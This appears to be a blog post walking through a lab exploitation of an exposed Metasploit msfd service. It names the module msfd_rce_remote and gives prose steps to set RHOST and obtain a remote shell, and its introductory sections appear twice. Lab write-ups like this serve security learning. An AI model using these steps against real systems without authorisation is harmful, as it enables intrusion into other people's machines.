Introduction
Msfd-service makes it possible to get a msfconsole-like interface using the ruby interpreter over a TCP socket. If the socket is accessible on a remote interface, an attacker can achieve a shell and execute commands on the victim’s machine and at this time, all version of Metasploit is affected by the vulnerability.
About msfd
Msfd is a tool that opens a network interface to a msfconsole. It can be executed by giving the IP address and the port (by default it runs on 55554) on which it should listen for incoming connections. This allows a single user or multiple users to connect from a remote system to the framework.
Lab Environment
Framework :- metasploit framework(MSF)
Victim’s Operating system:-linux kali 4.6.0-kali-amd64(2016.2)
Attacker's Operating system:-linux kali 4.15.0-kali-amd64(2018.2)
Msfd-service makes it possible to get a msfconsole-like interface using the ruby interpreter over a TCP socket. If the socket is accessible on a remote interface, an attacker can achieve a shell and execute commands on the victim’s machine and at this time, all version of Metasploit is affected by the vulnerability.
About msfd
Msfd is a tool that opens a network interface to a msfconsole. It can be executed by giving the IP address and the port (by default it runs on 55554) on which it should listen for incoming connections. This allows a single user or multiple users to connect from a remote system to the framework.
Lab Environment
Framework :- metasploit framework(MSF)
Victim’s Operating system:-linux kali 4.6.0-kali-amd64(2016.2)
Attacker's Operating system:-linux kali 4.15.0-kali-amd64(2018.2)
Step 1: Msfd service is running on the victim’s machine.
Step 2: Then attacker opens the msfconsole.
Step 3: Then attackers search for msfd and get two result ,use exploit/multi/misc/msfd_rce_remote
Step 4: Then attackers see the requirement of the exploit by typing “options” and see this exploit want only RHOST(victim’s IP) so they give the IP.
Step 5: Then they type “exploit” for gaining access to the victim machine and attacker get the raw shell of the victim's machine.
Step 6: Now attacker’s have the raw shell now attackers can do anything they want from victim's machine.
2 Comments
Will it work over wan?..
ReplyDeleteWhat is the vulnerability here.
ReplyDeleteWhat is the entry point from the attacker's view ?
What are the Exploitation vector ...